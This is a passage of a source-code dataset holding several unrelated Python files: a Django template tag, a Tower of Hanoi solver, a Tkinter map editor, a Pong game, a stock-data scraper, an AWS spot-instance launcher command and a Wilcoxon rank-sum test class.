self.language_in_context.resolve(context)\n except: # render in templates should fail silently\n return u''\n\n issues = IssueRevision.objects.filter(issue__story_type_count__gt=0, \n changeset__change_type=CTYPES['issue'],\n changeset__state=states.APPROVED).order_by('-changeset__modified')\\\n .select_related('issue', 'issue__series', 'issue__series__publisher')\n if self.language_code:\n issues = issues.filter(issue__series__language__code=self.language_code)\n \n last_updated_issues = issues[:self.number]\n return_string = u'
\n        return_string = u'<ul>'\n        for issue_revision in last_updated_issues:\n            i = issue_revision.issue\n            return_string += u'<li><a href=\"%s\">%s #%s</a> (%s)</li>' % \\\n                (i.get_absolute_url(), esc(i.series),\n                 esc(i.number), esc(i.series.publisher.name))\n        \n        return mark_safe(return_string+'</ul>
')\n\n\nregister.tag('last_updated_issues', last_updated_issues)\n","sub_path":"branches/bobbygrace/pydjango/apps/gcd/templatetags/statustags.py","file_name":"statustags.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"592641149","text":"# Tower of Hanoi\n\ndef move(no: int, x: int, y:int) -> None:\n    # move a stack of no disks from peg x to peg y\n    if no > 1:\n        move(no - 1, x, 6 - x - y)\n\n    print(f'Move disk [{no}] from peg {x} to peg {y}')\n\n    if no > 1:\n        move(no - 1, 6 - x -y, y)\n\nprint('Tower of Hanoi')\nn = int(input('Number of disks: '))\n\nmove(n, 1, 3)  # move the n disks stacked on peg 1 to peg 3","sub_path":"Recursive algorithm_5/5-3/hanoi.py","file_name":"hanoi.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"207652998","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.12-x86_64/egg/webstarts/gunicorn.py\n# Compiled at: 2017-09-29 15:01:16\n# Size of source mod 2**32: 1204 bytes\n\"\"\"Applicable to webstarts\"\"\"\nimport logging\nfrom gunicorn.app.wsgiapp import WSGIApplication\nfrom gunicorn.glogging import Logger\n__author__ = 'john'\nfrom . import types\n\nclass WebstartsApp(WSGIApplication):\n    __doc__ = 'Gunicorn wrapper'\n\n    def __init__(self, program, is_dev=False):\n        self.is_dev = is_dev\n        super().__init__(program)\n\n    def load_wsgiapp(self):\n        app = super().load_wsgiapp()\n        from . import log_id, wflask\n        app = log_id.wrap_logid(app)\n        app = wflask.wrap_sentry(app)\n        return app\n\n    def init(self, parser, opts, args):\n        cfg = super().init(parser, opts, args) or {}\n        cfg['logger_class'] = GunicornLogger\n        if self.is_dev:\n            cfg.update(reload=True, timeout=99999, accesslog='-')\n        return cfg\n\n\nclass GunicornLogger(Logger):\n\n    def setup(self, cfg):\n        super().setup(cfg)\n        self.error_log.propagate = True\n        self._set_handler(self.error_log, None, None)\n        self.access_log.propagate = True\n        self._set_handler(self.access_log, None, None)\n\n    @classmethod\n    def install(cls):\n        logging.setLoggerClass(types.WebstartsLogger)","sub_path":"pycfiles/webstarts-2.9.0-py3.6/gunicorn.cpython-36.py","file_name":"gunicorn.cpython-36.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"215020513","text":"\r\nimport pprint\r\nfrom mapedit import *\r\nfrom mapedit.widgets import *\r\nfrom mapedit.menu import MenuBar, register\r\nfrom mapedit.map import *\r\nfrom mapedit.palette import *\r\nfrom stexit3 import execute as e\r\n\r\nclass App:\r\n    never_disable = ('open_map', 'new_map')\r\n    map_file = ''\r\n    tile_set_file = ''\r\n    tile_set_dir = ''\r\n    def __init__(self):\r\n        self.root = Tk()\r\n        self._has_been_modified = False\r\n        self.menu = MenuBar(self)\r\n        self.map = MapBox(self)\r\n        self.palette = Palette(self)\r\n        self.map     .grid(column=0, row=0, sticky='nw')\r\n        self.palette .grid(column=1, row=0, sticky='ne')\r\n        self.map_file='aftereventrefactor.map'\r\n        self._open_map()\r\n        self.root.resizable(height=0, width=0)\r\n        self.root.title('Map editor')\r\n        self.root.mainloop()\r\n\r\n    def enable(self):\r\n        state.tiles.load_photos()\r\n        state.build_map()\r\n        state.current_tile = state.tiles[0,0]\r\n        photos.selected_tile_image = state.current_tile.image.resize((48,48))\r\n        self.palette.current_tile_label.config(image=photos.selected_tile_image)
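\r\n        # Lay out the palette: preview canvas on top, tool-size and current-tile\r\n        # controls in the middle rows, and the layer selector at the bottom.\r\n        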
self.palette.canvas .grid(row=0, column=0, columnspan=3)\r\n self.palette.sep1 .grid(row=1, column=0, columnspan=3,sticky='nsew',\r\n pady=5, padx=5)\r\n self.palette.tool_size_label.grid(row=2, column=0, sticky='nsew')\r\n self.palette.current_tile_label.grid(row=2, column=1, sticky='w',rowspan=2)\r\n self.palette.lbox.grid(row=3, column=0,sticky='nsew', padx=5)\r\n self.palette.sep2 .grid(row=4, column=0, sticky='nsew',\r\n columnspan=3, pady=5, padx=5)\r\n self.palette.layer_box .grid(row=5, column=0, columnspan=3)\r\n \r\n self.map.unloaded.grid_forget()\r\n self.map.canvas.grid(row=0, column=0)\r\n self.map.clear_canvas()\r\n if settings.map_width > 400:\r\n self.map.canvas.config(width=384,\r\n xscrollincrement=settings.tile_size,\r\n xscrollcommand=self.map.hbar.set,)\r\n self.map.hbar.grid(row=1, column=0, sticky='ew') \r\n else:\r\n self.map.vbar.grid_forget()\r\n if settings.map_height > 400:\r\n self.map.canvas.config(height=384,\r\n yscrollincrement=settings.tile_size,\r\n yscrollcommand=self.map.vbar.set,)\r\n self.map.vbar.grid(row=0, column=1, sticky='ns') \r\n else:\r\n self.map.vbar.grid_forget()\r\n self.map.move_to_left()\r\n self.map.move_to_top()\r\n self.map.canvas.config(scrollregion=(0, 0, *settings.map_size))\r\n self.map.make_background()\r\n self.map.map_background = self.map.canvas.create_image(\r\n settings.map_width//2,\r\n settings.map_height//2,\r\n image=photos.map_background)\r\n\r\n for item in state.stack:\r\n item.exec(self.map)\r\n self.palette.update_layer_views()\r\n self.palette.refresh_photo()\r\n self.bind_events()\r\n self.menu.enable_all()\r\n\r\n def set_title(self):\r\n asterick = '*' if self.has_been_modified else ''\r\n size = f'{settings.map_tile_width}x{settings.map_tile_height}'\r\n msg = f'{asterick}{self.map_file} {size}{asterick}'\r\n self.root.title(f'Map Editor - {msg}')\r\n \r\n @property\r\n def has_been_modified(self):\r\n return self._has_been_modified\r\n @has_been_modified.setter\r\n def has_been_modified(self, value):\r\n self._has_been_modified = value\r\n self.set_title()\r\n \r\n @register('file', never_disable=True)\r\n def new_map(self, *args):\r\n newmapwin = NewMapDialog(self.root)\r\n if newmapwin.confirmed:\r\n state.update(newmapwin.state)\r\n self.enable()\r\n self.map_file = 'New map'\r\n \r\n @register('file', never_disable=True)\r\n def open_map(self, *args):\r\n filename= askopenfilename(parent=self.root,\r\n title='Open',\r\n filetypes=(('Map files', '.*map'),),\r\n initialfile=self.map_file)\r\n if filename:\r\n self.map_file = filename\r\n self._open_map()\r\n def _open_map(self):\r\n with open(self.map_file, 'rb') as file:\r\n s = pickle.load(file)\r\n self.has_been_modified = False\r\n state.update(s)\r\n self.enable()\r\n w = settings.map_tile_width\r\n h = settings.map_tile_height\r\n\r\n register.separator('file')\r\n\r\n def _save_map(self):\r\n data = pickle.dumps(state)\r\n with open(self.map_file, 'wb') as file:\r\n file.write(data)\r\n self.has_been_modified = False\r\n @register('file')\r\n def save_map(self, *args):\r\n if not self.map_file:\r\n self.save_map_as()\r\n self._save_map()\r\n \r\n @register('file')\r\n def save_map_as(self, *args):\r\n filename = asksaveasfilename(parent=self.root,\r\n title='Save as',\r\n filetypes=(('Map files', '.*map'),),\r\n initialfile=self.map_file,\r\n defaultextension='.map')\r\n if filename:\r\n self.map_file = filename\r\n self._save_map()\r\n self.root.title(f'Map editor - {self.map_file}')\r\n\r\n register.separator('file')\r\n\r\n @register('file')\r\n 
def save_tile_set_as(self, *args):\r\n filename = asksaveasfilename(parent=self.root,\r\n title='Save tile set as',\r\n filetypes=(('Tile set files', '.*til'),),\r\n initialfile='',\r\n defaultextension='.til')\r\n if filename:\r\n with open(filename, 'wb') as file:\r\n pickle.dump(state.tiles, file)\r\n \r\n @register('edit')\r\n def undo(self, *args):\r\n if not state.stack:\r\n return\r\n executor = state.stack.pop()\r\n if isinstance(executor, MapAdd):\r\n events, tile = executor.events, executor.tile\r\n for event in events:\r\n cell = state.current_map[(*event.grid, tile.layer)]\r\n tile, tag = cell.pop()\r\n self.map.canvas.delete(tag)\r\n elif isinstance(executor, MapDel):\r\n events = executor.events\r\n for event, tile in events:\r\n MapAdd((event,),tile).exec(self.map)\r\n state.redo_stack.append(executor)\r\n \r\n @property\r\n def cm(self):\r\n return state.current_map\r\n \r\n def old_undo(self, *args):\r\n if not state.stack:\r\n return\r\n executor = state.stack.pop()\r\n if executor.func is map_del:\r\n index = state.stack.index(StackItem(map_add, *executor.args))\r\n state.stack[index].exec(self.map)\r\n elif executor.func is map_add:\r\n event, tile = executor.args\r\n cell = state.current_map[(*event.grid, tile.layer)]\r\n tile, tag = cell.pop()\r\n self.map.canvas.delete(tag)\r\n state.redo_stack.append(executor)\r\n\r\n @register('edit') \r\n def redo(self, *args):\r\n if not state.redo_stack:\r\n return\r\n executor = state.redo_stack.pop()\r\n executor.exec(self.map)\r\n state.stack.append(executor)\r\n\r\n register.separator('edit')\r\n\r\n @register('edit')\r\n def add_remove_tiles(self, *args):\r\n self.paletteeditorwin = PaletteEditor(self.root)\r\n if self.paletteeditorwin.status:\r\n state.tiles = self.paletteeditorwin.oldtiles\r\n state.tiles.load_photos()\r\n self.palette.refresh_photo()\r\n\r\n\r\n @register('edit')\r\n def edit_map_properties(self, *args):\r\n self.mapeditwin= EditMapProperties(self.root)\r\n if self.mapeditwin.confirmed:\r\n self.enable()\r\n \r\n register.separator('edit')\r\n @register('edit')\r\n def raise_all_layers(self, *args):\r\n for x,y in itergrid(16, 16):\r\n tile = state.tiles[x,y]\r\n tile.layer = min(tile.layer+1, 7) \r\n self.palette.layer_select_buttons[state.current_tile.layer].select()\r\n self.palette.update_layer_views()\r\n\r\n @register('edit')\r\n def lower_all_layers(self, *args):\r\n for x, y in itergrid(16, 16):\r\n tile = state.tiles[x,y]\r\n tile.layer = max(0, tile.layer-1)\r\n self.palette.layer_select_buttons[state.current_tile.layer].select()\r\n self.palette.update_layer_views()\r\n\r\n register.separator('edit')\r\n @register('edit')\r\n def insert_row_top(self):\r\n settings.map_tile_height += 1\r\n state.map_y_offset += 1\r\n self.map.canvas.config(scrollregion=(0, 0, *settings.map_size))\r\n for i, executor in enumerate(state.stack):\r\n events = []\r\n if isinstance(executor, MapDel):\r\n for event, tile in executor.events: \r\n events.append((event + (0, 1), tile))\r\n else:\r\n for event in executor.events: \r\n events.append(event + (0, 1))\r\n state.stack[i].events = tuple(events)\r\n for i, executor in enumerate(state.redo_stack):\r\n events = []\r\n if isinstance(executor, MapDel):\r\n for event, tile in executor.events: \r\n events.append((event + (0, 1), tile))\r\n else:\r\n for event in executor.events: \r\n events.append(event + (0, 1))\r\n state.redo_stack[i].events = tuple(events)\r\n self.map.clear_canvas()\r\n state.build_map()\r\n self.map.move_to_top()\r\n 
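# Replay the recorded draw events onto the rebuilt, taller grid; their\r\n        # coordinates were shifted by one row above so the history stays aligned.\r\n        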
self.map.make_background()\r\n        for executor in state.stack:\r\n            executor.exec(self.map)\r\n\r\n    @register('edit')\r\n    def insert_column_left(self):\r\n        settings.map_tile_width += 1\r\n        state.map_x_offset += 1\r\n        self.map.canvas.config(scrollregion=(0, 0, *settings.map_size))\r\n        for i, executor in enumerate(state.stack):\r\n            events = []\r\n            if isinstance(executor, MapDel):\r\n                for event, tile in executor.events: \r\n                    events.append((event + (1, 0), tile))\r\n            else:\r\n                for event in executor.events: \r\n                    events.append(event + (1, 0))\r\n            state.stack[i].events = tuple(events)\r\n        for i, executor in enumerate(state.redo_stack):\r\n            events = []\r\n            if isinstance(executor, MapDel):\r\n                for event, tile in executor.events: \r\n                    events.append((event + (1, 0), tile))\r\n            else:\r\n                for event in executor.events: \r\n                    events.append(event + (1, 0))\r\n            state.redo_stack[i].events = tuple(events)\r\n        self.map.clear_canvas()\r\n        state.build_map()\r\n        self.map.move_to_left()\r\n        self.map.make_background()\r\n        for executor in state.stack:\r\n            executor.exec(self.map)\r\n    \r\n    @register('view')\r\n    def preview(self, *args):\r\n        MapPreview(self.root)\r\n\r\n    \r\n    def bind_events(self):\r\n        _map, _palette = self.map, self.palette\r\n        _map.canvas.bind('<Button-1>', _map.clickleft)\r\n        _map.canvas.bind('<Button-3>', _map.clickright)\r\n        _map.canvas.bind('<ButtonRelease-1>', _map.release)\r\n        _map.canvas.bind('<ButtonRelease-3>', _map.release)\r\n        _map.canvas.bind('<Motion>', _map.motion)\r\n        _palette.canvas.bind('<Button-1>', _palette.clickleft)\r\n        _palette.canvas.bind('<Motion>', _palette.motion)\r\n        _palette.canvas.bind('<ButtonRelease-1>', _palette.releaseleft)\r\n        _palette.canvas.bind('<Button-3>', _palette.clickright)\r\n        _palette.canvas.bind('<ButtonRelease-3>', self.palette.releaseright)\r\n        for cmd, key in settings.key_bindings.items():\r\n            command = getattr(self, cmd)\r\n            if command.can_be_disabled:\r\n                self.root.bind(key, command)\r\n\r\n    def unbind_events(self):\r\n        _map, _palette = self.map, self.palette\r\n        _map.canvas.unbind('<Button-1>')\r\n        _map.canvas.unbind('<Button-3>')\r\n        _map.canvas.unbind('<Motion>')\r\n        _palette.canvas.unbind('<Button-1>')\r\n        _palette.canvas.unbind('<Motion>')\r\n        _palette.canvas.unbind('<ButtonRelease-1>')\r\n        _palette.canvas.unbind('<Button-3>')\r\n        _palette.canvas.unbind('<ButtonRelease-3>')\r\n        self.root.unbind('')\r\n        self.root.unbind('')\r\na=App()\r\nself = a.map\r\n","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":13047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"23503165","text":"import re\nimport os\nimport chardet\nimport traceback\n\nos.chdir('/home/lithium/Documents')\ndirlist = os.listdir('GOT')\nfinal = open('GOTscript.txt', 'w')\n\nfor dir in dirlist:\n    filelist = os.listdir(f'GOT/{dir}')\n    for file in filelist:\n\n        try:\n\n            f = open(f'GOT/{dir}/{file}', 'rb')\n            bcontent = f.read(128 * 2)\n            char1 = chardet.detect(bcontent)\n            f.seek(0)  # rewind so the decode below covers the whole file\n            content = f.read().decode(char1['encoding'])\n            dia_list = re.findall(r'0000,0000,0000,,(.*?)\\\\N{\\\\fnCalibri Italic\\\\fs18\\\\1c&H3CF1F3&}(.*?){\\\\r}', \\\n                                  content)\n            print(dia_list)\n            print(f'GOT/{dir}/{file}')\n            flag = re.findall(r'(S\\d{2}E\\d{2})', file)[0]\n            final.write(flag + '\\n')\n            for dia in dia_list:\n                final.write(dia[1].replace('-', ' ') + ' ')\n            final.write('\\n\\n')\n        except:\n            pass\n        # f = open(f'GOT/{dir}/{file}', 'rb')\n        # content = f.read().decode('utf-8-sig')\n        # dia_list = re.findall(r'0000,0000,0000,,(.*?)\\\\N{\\\\fnCalibri Italic\\\\fs18\\\\1c&H3CF1F3&}(.*?){\\\\r}', \\\n        #                       content)\n        # print(dia_list)\n        # for dia in dia_list:\n        #     final.write(dia[1].replace('-', ' ') + ' ')\n        # 
final.write('\\n\\n')\nfinal.close()\n","sub_path":"PyspiderSingle/GOT.py","file_name":"GOT.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"458315729","text":"# import the requests package\nimport requests\nimport json\nimport sys\n\ndef print_except(func_name, exc_info, e):\n    # assumed minimal implementation: this helper was referenced but never defined\n    print('error in {}: {}'.format(func_name, e))\n\ndef get_hangye_data():\n    ret_data = []\n    try:\n        url = 'https://push2.eastmoney.com/api/qt/clist/get?cb=jQuery112307879834664846898_1630941013041&fid=f62&po=1&pz=60&pn=1&np=1&fltt=2&invt=2&ut=b2884a393a59ad64002292a3e90d46a5&fs=m%3A90+t%3A2&fields=f12%2Cf14%2Cf2%2Cf3%2Cf62%2Cf184%2Cf66%2Cf69%2Cf72%2Cf75%2Cf78%2Cf81%2Cf84%2Cf87%2Cf204%2Cf205%2Cf124%2Cf1%2Cf13'\n        ret = requests.get(url)\n        if ret.status_code == 200:\n            data = str(ret.content,encoding='utf-8')\n            data = data.replace('jQuery112307879834664846898_1630941013041(','').strip()\n            data = data[:-1].replace(\")\",'')\n            #print(data)\n            data = json.loads(data)\n            #print(data)\n            if 'data' in data:\n                data = data['data']\n                if 'diff' in data:\n                    for item in data['diff']:\n                        if 'f62' in item and float(item['f62']) > 0 and 'f66' in item and float(item['f66']) > 0 : # main-force inflow and extra-large order inflow\n                            if 'f3' in item and float(item['f3']) > 0: # price rising\n                                ret_data.append(item)\n\n    except Exception as e:\n        print_except(sys._getframe().f_code.co_name, sys.exc_info(), e)\n    return ret_data\n\ndata = get_hangye_data()\nprint(data)","sub_path":"stock.py","file_name":"stock.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"177163631","text":"# Implementation of classic arcade game Pong\n\nimport simplegui\nimport random\n\n# initialize globals - pos and vel encode vertical info for paddles\nWIDTH = 600\nHEIGHT = 400\nBALL_RADIUS = 20\nPAD_WIDTH = 8\nPAD_HEIGHT = 80\nHALF_PAD_WIDTH = PAD_WIDTH / 2\nHALF_PAD_HEIGHT = PAD_HEIGHT / 2\nLEFT = False\nRIGHT = True\ncounterR = 0\ncounterL = 0\n\n\n# initialize ball_pos and ball_vel for new ball in middle of table\n# if direction is RIGHT, the ball's velocity is upper right, else upper left\ndef spawn_ball(direction):\n    global ball_pos, ball_vel # these are vectors stored as lists\n    ball_pos = [WIDTH / 2, HEIGHT / 2]\n    ball_vel = [(random.randrange(120, 240)) / 60, -(random.randrange(60, 180)) / 60]\n    if direction == RIGHT:\n        ball_vel[0] = ball_vel[0]\n\n    elif direction == LEFT:\n        ball_vel[0] = -ball_vel[0]\n\n\n# return ball_pos, ball_vel\n\n\n# define event handlers\ndef new_game():\n    global paddle1_pos, paddle2_pos, paddle1_vel, paddle2_vel # these are numbers\n    global score1, score2, counterR, counterL # these are ints\n    counterR = 0\n    counterL = 0\n    spawn_ball(RIGHT)\n\n    paddle1_pos = (HEIGHT - PAD_HEIGHT) / 2\n    paddle2_pos = (HEIGHT - PAD_HEIGHT) / 2\n    paddle1_vel = 0\n    paddle2_vel = 0\n\n\ndef draw(canvas):\n    global score1, score2, paddle1_pos, paddle2_pos\n    global ball_pos, ball_vel, paddle1_vel, paddle2_vel\n    global counterR, counterL\n\n    # draw mid line and gutters\n    canvas.draw_line([WIDTH / 2, 0], [WIDTH / 2, HEIGHT], 1, \"White\")\n    canvas.draw_line([PAD_WIDTH, 0], [PAD_WIDTH, HEIGHT], 1, \"Red\")\n    canvas.draw_line([WIDTH - PAD_WIDTH, 0], [WIDTH - PAD_WIDTH, HEIGHT], 1, \"Blue\")\n\n    # update ball\n    ball_pos[0] += ball_vel[0]\n    ball_pos[1] += ball_vel[1]\n    if ball_pos[1] <= BALL_RADIUS or ball_pos[1] >= HEIGHT - BALL_RADIUS:\n        ball_vel[1] = -ball_vel[1]\n    elif (ball_pos[1] > paddle1_pos and ball_pos[1] <\n          paddle1_pos + PAD_HEIGHT and ball_pos[0] <=\n          PAD_WIDTH + BALL_RADIUS or ball_pos[1] >\n          paddle2_pos 
and ball_pos[1] < paddle2_pos +\n PAD_HEIGHT and ball_pos[0] >= WIDTH -\n PAD_WIDTH - BALL_RADIUS):\n ball_vel[0] = -ball_vel[0]\n ball_vel[0] = ball_vel[0] * 1.1\n ball_vel[1] = ball_vel[1] * 1.1\n\n elif ball_pos[0] <= PAD_WIDTH + BALL_RADIUS:\n spawn_ball(RIGHT)\n counterR += 1\n elif ball_pos[0] >= WIDTH - PAD_WIDTH - BALL_RADIUS:\n spawn_ball(LEFT)\n counterL += 1\n\n # draw ball\n canvas.draw_circle(ball_pos, BALL_RADIUS, 2, \"White\", \"Gray\")\n\n # update paddle's vertical position, keep paddle on the screen\n if paddle1_pos + paddle1_vel <= HEIGHT - PAD_HEIGHT and paddle1_pos + paddle1_vel > 0:\n paddle1_pos += paddle1_vel\n if paddle2_pos + paddle2_vel <= HEIGHT - PAD_HEIGHT and paddle2_pos + paddle2_vel > 0:\n paddle2_pos += paddle2_vel\n # draw paddles\n canvas.draw_line([HALF_PAD_WIDTH, paddle1_pos], [HALF_PAD_WIDTH,\n paddle1_pos + PAD_HEIGHT], PAD_WIDTH, \"Red\")\n canvas.draw_line([WIDTH - HALF_PAD_WIDTH, paddle2_pos],\n [WIDTH - HALF_PAD_WIDTH, paddle2_pos + PAD_HEIGHT], PAD_WIDTH, \"Blue\")\n\n # determine whether paddle and ball collide\n\n # draw scores\n canvas.draw_text(\"Bluee : \" + str(counterR), [(WIDTH / 2 + WIDTH / 6), (HEIGHT / 12)], 24, \"Blue\")\n canvas.draw_text(\"Redya : \" + str(counterL), [(WIDTH / 6), (HEIGHT / 12)], 24, \"Red\")\n\n\ndef keydown(key):\n global paddle1_vel, paddle2_vel\n if key == simplegui.KEY_MAP['w']:\n paddle1_vel -= 3\n if key == simplegui.KEY_MAP['s']:\n paddle1_vel += 3\n if key == simplegui.KEY_MAP['up']:\n paddle2_vel -= 3\n if key == simplegui.KEY_MAP['down']:\n paddle2_vel += 3\n\n\ndef keyup(key):\n global paddle1_vel, paddle2_vel\n if key == simplegui.KEY_MAP['w']:\n paddle1_vel = 0\n if key == simplegui.KEY_MAP['s']:\n paddle1_vel = 0\n if key == simplegui.KEY_MAP['up']:\n paddle2_vel = 0\n if key == simplegui.KEY_MAP['down']:\n paddle2_vel = 0\n\n\ndef restart():\n new_game()\n\n\n# create frame\nframe = simplegui.create_frame(\"Pong\", WIDTH, HEIGHT)\nframe.set_draw_handler(draw)\nframe.set_keydown_handler(keydown)\nframe.set_keyup_handler(keyup)\nrestart0 = frame.add_button(\"Restart\", restart, 100)\n\n# start frame\nnew_game()\nframe.start()\n","sub_path":"PyFundamentals/5 pong.py","file_name":"5 pong.py","file_ext":"py","file_size_in_byte":4385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"351147425","text":"import boto3\nfrom spotty.aws_cli import AwsCli\nfrom spotty.commands.abstract_config import AbstractConfigCommand\nfrom spotty.helpers.resources import wait_stack_status_changed\nfrom spotty.helpers.spot_prices import get_current_spot_price\nfrom spotty.helpers.validation import validate_instance_config\nfrom spotty.project_resources.bucket import BucketResource\nfrom spotty.project_resources.instance_profile import create_or_update_instance_profile\nfrom spotty.project_resources.stack import StackResource\nfrom spotty.commands.writers.abstract_output_writrer import AbstractOutputWriter\n\n\nclass StartCommand(AbstractConfigCommand):\n\n @staticmethod\n def get_name() -> str:\n return 'start'\n\n @staticmethod\n def get_description():\n return 'Run spot instance, sync the project and start the Docker container'\n\n @staticmethod\n def _validate_config(config):\n return validate_instance_config(config)\n\n def run(self, output: AbstractOutputWriter):\n project_config = self._config['project']\n instance_config = self._config['instance']\n\n region = instance_config['region']\n cf = boto3.client('cloudformation', region_name=region)\n ec2 = 
boto3.client('ec2', region_name=region)\n s3 = boto3.client('s3', region_name=region)\n\n project_name = project_config['name']\n stack = StackResource(cf, project_name, region)\n\n # check if the stack already exists\n if stack.stack_exists():\n raise ValueError('Stack \"%s\" already exists.\\n'\n 'Use \"spotty stop\" command to delete the stack.' % stack.name)\n\n # create bucket for the project\n project_bucket = BucketResource(s3, project_name, region)\n bucket_name = project_bucket.create_bucket(output)\n\n # sync the project with S3\n output.write('Syncing the project with S3...')\n\n project_filters = project_config['syncFilters']\n AwsCli(region=region).s3_sync(self._project_dir, 's3://%s/project' % bucket_name, delete=True,\n filters=project_filters, capture_output=False)\n\n # create or update instance profile\n instance_profile_arn = create_or_update_instance_profile(cf, output)\n\n # prepare CloudFormation template\n output.write('Preparing CloudFormation template...')\n\n # check availability zone\n availability_zone = instance_config['availabilityZone']\n if availability_zone:\n zones = ec2.describe_availability_zones()\n zone_names = [zone['ZoneName'] for zone in zones['AvailabilityZones']]\n if availability_zone not in zone_names:\n raise ValueError('Availability zone \"%s\" doesn\\'t exist in the \"%s\" region.'\n % (availability_zone, region))\n\n instance_type = instance_config['instanceType']\n volumes = instance_config['volumes']\n ports = instance_config['ports']\n max_price = instance_config['maxPrice']\n docker_commands = instance_config['docker']['commands']\n\n template = stack.prepare_template(ec2, availability_zone, instance_type, volumes, ports, max_price,\n docker_commands)\n\n # create stack\n ami_name = instance_config['amiName']\n root_volume_size = instance_config['rootVolumeSize']\n mount_dirs = [volume['directory'] for volume in volumes]\n docker_config = instance_config['docker']\n remote_project_dir = project_config['remoteDir']\n\n res = stack.create_stack(ec2, template, instance_profile_arn, instance_type, ami_name, root_volume_size,\n mount_dirs, bucket_name, remote_project_dir, docker_config)\n\n output.write('Waiting for the stack to be created...')\n\n resource_messages = [\n ('SpotInstance', 'launching the instance'),\n ('DockerReadyWaitCondition', 'waiting for the Docker container to be ready'),\n ]\n\n # wait for the stack to be created\n status, info = wait_stack_status_changed(cf, stack_id=res['StackId'], waiting_status='CREATE_IN_PROGRESS',\n resource_messages=resource_messages,\n resource_success_status='CREATE_COMPLETE', output=output)\n\n if status == 'CREATE_COMPLETE':\n ip_address = [row['OutputValue'] for row in info['Outputs'] if row['OutputKey'] == 'InstanceIpAddress'][0]\n availability_zone = [row['OutputValue'] for row in info['Outputs']\n if row['OutputKey'] == 'AvailabilityZone'][0]\n\n # get the current spot price\n current_price = get_current_spot_price(ec2, instance_type, availability_zone)\n\n output.write('\\n'\n '--------------------\\n'\n 'Instance is running.\\n'\n '\\n'\n 'IP address: %s\\n'\n 'Current Spot price: $%.04f\\n'\n '\\n'\n 'Use \"spotty ssh\" command to connect to the Docker container.\\n'\n '--------------------' % (ip_address, current_price))\n else:\n raise ValueError('Stack \"%s\" was not created.\\n'\n 'Please, see CloudFormation and CloudWatch logs for the details.' 
% stack.name)\n","sub_path":"spotty/commands/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":5461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"619963228","text":"import shutil\n\n#folder = \"/home/user/Desktop/Link to stalls/kitchen/faucet01/roulette/src/data/jake_FINAL/clips/waitlean/\"\n#prefix = \"waitlean\"\n#suffix = \".png\"\n#rstart = 0\n#rend = 11\n#outputstart = 11\n#frames = 100\n#reverse = False\n\n#folder = \"/home/user/Desktop/Link to stalls/kitchen/faucet01/roulette/src/data/jake_FINAL/clips/leantowait/\"\n#prefix = \"leantowait\"\n#suffix = \".png\"\n#rstart = 12\n#rend = 19\n#outputstart = 19\n#frames = 40\n#reverse = True\n\n#folder = \"/home/user/Desktop/Link to stalls/kitchen/faucet01/roulette/src/data/jake_FINAL/clips/Bdies5/\"\n#prefix = \"Bdies5\"\n#suffix = \".png\"\n#rstart = 39\n#rend = 49\n#outputstart = 49\n#frames = 200\n#reverse = True\n\nfolder = \"/home/user/stalls/kitchen/faucet01/roulette/src/data/jake_FINAL/clips/wait_2/\"\nprefix = \"wait_2\"\nsuffix = \".png\"\nrstart = 0\nrend = 21\noutputstart = 21\nframes = 100\nreverse = True\n\n\nl = list(range(rstart,rend))\nif reverse: l.reverse()\nf = []\nwhile len(f) < frames:\n    f.extend(l[0:len(l)-1])\n    l.reverse()\n\nfor i in range(0,len(f)):\n    shutil.copyfile(folder+prefix+str(f[i]).zfill(5)+suffix, folder+prefix+str(outputstart+i).zfill(5)+suffix)\n    \n\n\nl = list(range(rstart,rend))\nf = []\nwhile len(f) < frames:\n    f.extend(l[0:len(l)-1])\n    l.reverse()\n\nfor i in range(0,len(f)):\n    shutil.copyfile(folder+prefix+str(f[i]).zfill(5)+suffix, folder+prefix+str(outputstart+i).zfill(5)+suffix)\n    \n\n","sub_path":"src/scripts/clipextender.py","file_name":"clipextender.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"533857459","text":"import Rank_Sum_Test as RST\r\n\r\nclass Wilcoxon_Rank_Sum_Test(RST.Rank_Sum_Test):\r\n    def __init__(self, sample1, sample2):\r\n        super(Wilcoxon_Rank_Sum_Test, self).__init__(sample1, sample2, True)\r\n\r\n    def isf(self, alpha):\r\n        # sf_list - accumulative of density (x>=, in descending order, 10, 9, 8, ...)\r\n\r\n        if self.success < 0:\r\n            return -1, -1\r\n\r\n        last_idx = -1\r\n        for i in range(len(self.sf_list)):\r\n            if alpha <= self.sf_list[i][2]:\r\n                return self.sf_list[last_idx][0], self.sf_list[last_idx][2]\r\n            last_idx = i\r\n        return -1, -1\r\n\r\n    def ppf(self, alpha):\r\n        # cdf_list - accumulative of density (<=x, in ascending order, 1,2, 3, ...)\r\n\r\n        if self.success < 0:\r\n            return -1, -1\r\n\r\n        last_idx = -1\r\n        for i in range(len(self.cdf_list)):\r\n            if alpha <= self.cdf_list[i][2]:\r\n                return self.cdf_list[last_idx][0], self.cdf_list[last_idx][2]\r\n            last_idx = i\r\n        return -1, 